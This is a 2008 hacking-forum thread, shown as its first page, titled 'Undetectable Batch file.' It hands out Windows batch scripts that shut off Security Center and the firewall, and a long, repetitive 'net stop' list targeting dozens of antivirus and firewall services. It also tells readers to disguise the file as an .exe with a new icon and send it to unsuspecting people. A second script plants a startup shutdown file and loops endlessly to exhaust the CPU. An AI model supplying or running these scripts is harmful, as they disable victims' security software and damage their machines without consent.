Go4Expert
Page 1 of 3
1
2
3
Show 40 post(s) from this thread on one page

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/forumdisplay.php?f=55)
-   -   Undetectable Batch file. (http://www.go4expert.com/showthread.php?t=11844)

XXxxImmortalxxXX 4Jul2008 14:06
Undetectable Batch file.
 
Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:

Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
hat will stop the Security Center
Shared Access and Firewall.

Save the file as something.bat

But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?

Exe:

Download nBinder Pro:
Code:
h*tp://www.midload.com/en/file/29192/nbinder-rar

mirror

h*tp://rapidshare.com/files/109795148/nbinder.rar
pass
linkzshare.net
NBinder pro is a Binder/Converter/Icon Changer

Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.


Com:
Download:
Bat2COM
And convert it.

When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn't see is that his firewall,security has closed.

Now,to make the batch a little more dangerous.

Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"
:virus
start cmd.exe
start command.com
start mspaint.exe
goto :virus
So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.


hope that helps i see a lot of ppl asking how to do this so thought i show you all

GreenGrass 7Jul2008 11:43
Re: Undetectable Batch file.
 
Thanks this helps alot...

XXxxImmortalxxXX 7Jul2008 11:44
Re: Undetectable Batch file.
 
no problem alos in one of your post you wanted to know what program i used to convert my batch files into picture files well these are the programs that i used

hanleyhansen 16Jul2008 04:24
Re: Undetectable Batch file.
 
This is great but will it work with commercial antivirus and firewall programs apart from the ones from windows?

XXxxImmortalxxXX 16Jul2008 08:51
Re: Undetectable Batch file.
 
it can ive done it before

but i usualy insert this within the script


Code:
@echo off
net stop AVP.EXE 
net stop CFINET32
net stop CFINET
net stop ICMON
net stop SAFEWEB
net stop WEBSCANX
net stop ANTIVIR
net stop MCAFEE
net stop NORTON
net stop NVC95
net stop FP-WIN
net stop IOMON98
net stop PCCWIN98
net stop F-PROT95
net stop F-STOPW
net stop PVIEW95
net stop NAVWNT
net stop NAVRUNR
net stop NAVLU32
net stop NAVAPSVC
net stop NISUM
net stop SYMPROXYSVC
net stop RESCUE32
net stop NISSERV
net stop ATRACK
net stop IAMAPP
net stop LUCOMSERVER
net stop LUALL
net stop NMAIN
net stop NAVW32
net stop NAVAPW32
net stop VSSTAT
net stop VSHWIN32
net stop AVSYNMGR
net stop AVCONSOL
net stop WEBTRAP
net stop POP3TRAP
net stop PCCMAIN
net stop PCCIOMON
net stop AHNLAB
net stop KIMLAB
net stop MONSYSNT
net stop MONSVCNT
net stop NAVAPW32
net stop NAVAPSVC
net stop NAVW32
net stop NAVWNT
net stop V3PRO32
net stop V3
net stop V3CFGU
net stop V3P3AT
net stop knlscan
net stop scanner.exe
net stop scanner
net stop SpiderNT
net stop SpiderUI
net stop spider
net stop Vcrmon
net stop vcr32
net stop kavsvc
net stop kav.exe
net stop KVAgent
net stop KVDOS
net stop KVSrvXP
net stop KVwsc
net stop kvwsc
net stop RavMon
net stop RavMonD.exe
net stop RavMonD
net stop RAV.exe
net stop WATCHER
net stop avgupsvc
net stop avgamsvr
net stop avgemc
net stop avgupsvc
net stop zlclient
net stop AszMon.exe
net stop AszTray.exe
net stop AhnRpt
net stop mssvc
net stop ADSpider.exe
net stop firedaemon.exe
net stop servudaemon.exe
net stop firedaemon
net stop CCAPP.exe
net stop servu.exe
net stop McVSEscn.exe
net stop mcagent.exe
net stop fxsvc.exe
net stop clisvc.exe
net stop vrmonsvc.exe
net stop dllhost.exe
net stop RsRavMon
net stop RsCCenter
net stop Norton AntiVirus Server
net stop Norton AntiVirus
net stop Serv-U
net stop Norton AntiVirus Auto Protect Service
net stop Norton AntiVirus Client
net stop Symantec AntiVirus Client
net stop Norton AntiVirus Server
net stop NAV Alert
net stop Nav Auto-Protect
net stop McShield
net stop DefWatch
net stop eventlog
net stop WMDM PMSP Service
net stop lmhosts
net stop eventlog
net stop InoRPC
net stop InoRT
net stop InoTask
net stop IREIKE
net stop IPSECMON
net stop GhostStartService
net stop SharedAccess
net stop NAVAPSVC
net stop NISUM
net stop SymProxySvc
net stop NISSERV
net stop ntrtscan
net stop tmlisten
net stop PccPfw
net stop tmproxy
net stop Tmntsrv
net stop PCCPF
net stop AvSynMgr
net stop McAfeeFramework
net stop Micorsoft Network Firewall Service
net stop avgServ
net stop MonSvcNT
net stop V3MonNT
net stop V3MonSvc
net stop spidernt
net stop MCVSrte
net stop SweepNet
net stop SWEEPSRV.SYS
net stop Aavgupsvc
net stop KVAgent
net stop KVDos.exe
net stop KVSrvXP.exe
net stop kvwsc.exe
net stop DefWatch.exe
net stop DWHWizrd.exe
net stop LDVPREG.exe
net stop LuaWrap.exe
net stop Rtvscan.exe
net stop SavRoam.exe
net stop SymClnUp.exe
net stop VPC32.exe
net stop VPDN_LU.exe
net stop VPTray.exe
net stop viruscan
net stop viruscan.inf
net stop viruscan1.dat
net stop viruscan2.dat
net stop GhostStartTrayApp
net stop GhReboot
net stop ghstwalk
net stop ghwrap
net stop Ghost Boot Wizard
net stop ghost
net stop Ghostexp
net stop GhostStart
net stop GhostStartService
net stop AVG RESIDENT SHIELD
net stop "Turbo Vaccine Monitoring Service"
net stop "MonSvcNT"
net stop "rising process communication center"
net stop "rising realtime monitor service"
net stop "OfficeScanNT Monitor"
net stop "RemoteAgent"
net stop "Ahnlab Task Scheduler"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "Trend Micro Real-time Service"
net stop "Trend Micro Personal Firewall
net stop "Trend Micro Central Control Component""
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop " McAfee SecurityCenter Update Manager "
net stop "McShield"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sygate Personal Firewall"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "Quick Heal Online Protection"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Security Center"
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "NAV Alert"
net stop "NAV Auto-Protect"
net stop "ScriptBlocking Service"
net stop "DefWatch"
net stop "Background Intelligent Transfer Service"
net stop "System Event Notification"
net stop "BlackICE"
net stop "AVSync Manager"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop "InVircible Scheduler"
net stop "kavsvc"
net stop "avast! Antivirus"
net stop "avast! iAVS4 Control Service"
net stop "Trend ServerProtect Agent"
net stop "Trend ServerProtect "
net stop "AVG6 Service"
net stop "AVG RESIDENT SHIELD"
net stop "nod32kui"
net stop nod32kui
net stop "nod32krn"
net stop nod32krn
net stop "nod32krn.exe"
net stop nod32krn.exe
net stop "Turbo Vaccine Monitoring Service"
net stop "MonSvcNT"
net stop "rising process communication center"
net stop "rising realtime monitor service"
net stop "OfficeScanNT Monitor"
net stop "RemoteAgent"
net stop "Ahnlab Task Scheduler"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "Trend Micro Real-time Service"
net stop "Trend Micro Personal Firewall
net stop "Trend Micro Central Control Component""
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop " McAfee SecurityCenter Update Manager "
net stop "McShield"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sygate Personal Firewall"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "Quick Heal Online Protection"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Security Center"
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "NAV Alert"
net stop "NAV Auto-Protect"
net stop "ScriptBlocking Service"
net stop "DefWatch"
net stop "Background Intelligent Transfer Service"
net stop "System Event Notification"
net stop "BlackICE"
net stop "AVSync Manager"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop "InVircible Scheduler"
net stop "kavsvc"
net stop "avast! Antivirus"
net stop "avast! iAVS4 Control Service"
net stop "Trend ServerProtect Agent"
net stop "Trend ServerProtect "
net stop "AVG6 Service"

and that does it

styles 6Aug2008 11:38
Re: Undetectable Batch file.
 
You said something like "insert this within the script"...where in the script do we insert it. Can you give us a full code from beginning to end? Does this also disable bitdefender virus scanners as well?

angelsdemise 7Aug2008 15:10
Re: Undetectable Batch file.
 
undetectable? lol whenever i come to this page my avast alerts me of a trojan :D

XXxxImmortalxxXX 11Aug2008 00:11
Re: Undetectable Batch file.
 
:)

faizulhaque 11Aug2008 10:51
Re: Undetectable Batch file.
 
Tested Really it's undetected for Kaspersky IS 2009.
But When I start Parental Control, it's giving denied access

XXxxImmortalxxXX 11Aug2008 22:08
Re: Undetectable Batch file.
 
hmmm il make a sript to block it one sec


All times are GMT +5.5. The time now is 23:18.
Page 1 of 3
1
2
3
Show 40 post(s) from this thread on one page